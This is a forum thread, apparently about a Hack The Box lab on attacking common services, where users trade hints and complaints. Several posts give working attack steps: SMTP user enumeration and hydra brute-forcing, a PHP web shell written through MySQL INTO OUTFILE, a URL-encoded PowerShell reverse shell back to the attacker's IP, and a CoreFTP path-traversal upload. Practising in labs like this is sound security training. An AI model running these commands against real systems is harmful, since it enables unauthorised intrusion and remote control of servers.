Attacking Common Services - Easy

If anyone is else is getting the error: mysql: command not found:
It seems that mysql isn’t currently installed in the attackbox so you have to do it yourself.
type: sudo apt install mariadb-client to get it going

I agree with everyone that this password should really be a password from the resources list… however, you must enumerate the password using rockyou

smtp-user-enum xxxxxxxxxx 25 -m RCPT -d inlanefreight.htb -U usernames

hydra -l xxxxxx@inlanefreight.htb -P rockyou xxxxxxxxxx smtp -t 40 -s -vvv

Yeah I didn’t like the first part. I was able to find the username no problem. But what to do with this information was annoying. Should be sticking to the resources in the module if that’s what you have been using this entire module. However, once you get into the database. That is interesting and a good learning experience into webshells. I didn’t bother with FTP.

fr I wasted so much time thinking that the password would be in the resource list. Like whats the point of the resources anymore.

Hello for everyone;

If someone is always stuck in this part and needs some hints abt how to get the flag ;
1/ Do your enumeration and get the necessary creds,
2/ Try these with the active services on the target machine,
3/ If Else you tried to use mysql => SELECT LOAD_FILE(CONCAT(@@basedir, ‘Path_to_the_flag\flag.txt’));

-----G00d H4Ck1N9------

STOP OVERHEADING
Finding a web server doesn’t mean you need to exploit it. Avoid overcomplicating the process; simple methods often yield better results.

1. Access MySQL: Connect using the obtained credentials.
2. Read a File: Execute LOAD_FILE to retrieve the file contents.

If you have problems with hydra terminate the machine and start a new one.
I wasted a lot of time thinking i was wrong but the problem was from the machine.

Also if you have the following error for SQL
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Add --skip-ssl at the final of the command, it should look like this:
mysql -u <user> -p<pass> -h <ip> --skip-ssl

If you find credentials ,there is another way to get the flag. Latest FTP Vulnerabilities section mentions CoreFTP before build 727 vulnerability. It is easy as mysql way. File traversal is the key.

One way is:

smtp-user-enum and get the user;
hydra brute-force the smtp for the pass;
try the creds against the available services;
find that they work on mysql;
enumerate the mysql db for any new leads;
drop a shell:

SELECT "<?php if(isset($_GET['cmd'])){ echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>" INTO OUTFILE 'C:/xampp/htdocs/cmd.php'; 

#test via curl:
curl http://10.129.91.12/cmd.php?cmd=whoami

#if OK:
#Start your listener
nc -lvnp 4444

#Then through the webshell (URL encode this):
curl http://target_ip/cmd.php?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27***YOUR_IP***%27%2C4444%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

catch the shell and cat the flag!

https://www.revshells.com/ will create a nice reverse shell. Use the PowerShell #3 (Base64) shell so you don’t have to worry about URL-encoding anything.

To upload a reverse shell using MySQL:

SELECT "<?php echo shell_exec('<shell command>');?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';

where <shell command> is what you copy from the clipboard in the revshells.com window; it looks like: powershell -e BlahblahBLAH

To upload a reverse shell using FTP vulnerable to CVE-2022-22836:

curl -k -X PUT -H "Host: inlanefreight.htb" --basic -u username:password --data-binary '<?php shell_exec("<shell code>"); ?>' --path-as-is https://10.129.178.249/../../../../xampp/htdocs/shell.php

where username and password are the credentials you enumerated.

Make sure you actually see port 25 open on your namp scan. I’ve wasted hours against this machine, because it was duff.

PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
443/tcp open https
587/tcp open submission
3306/tcp open mysql
3389/tcp open ms-wbt-server

Can someone please help me? I’ve tried smtp-user-enum tool with the user.list from the resources, but I’m not getting anything. I also checked for the port 25 to be opened. I’ve been working on this lab for far too long without any luck. I read every comment in this thread, but still can’t even find the user.

Hi,

I’m experiencing some issues with this lab and would appreciate some clarification:

1. Why does SMTP not allow VRFY or EXPN on both ports?
2. Why are we required to use rockyou.txt or another external wordlist when the module already provides one?

To be honest, this and the password attack assessments feel poorly designed. They seem like a complete waste of time.

After long brute-force attempts, you eventually find a user and password. However, there seems to be no other way to progress. I’m not sure how others in this thread are managing, but I’ve tried resetting the server multiple times over several days, and the results are always the same.

Could you please clarify if this is the intended experience or if something is wrong with the setup?

Just writing to express my complete frustration with HTB.
Clearly when you provide a password list in resources, people will expect to use this for all password spraying as it’s a lab environment.
I wasted hours because of this. For anyone else stuck, use rockyou.

I encounter the same issue. Just reset the target and you will find everything is working fine.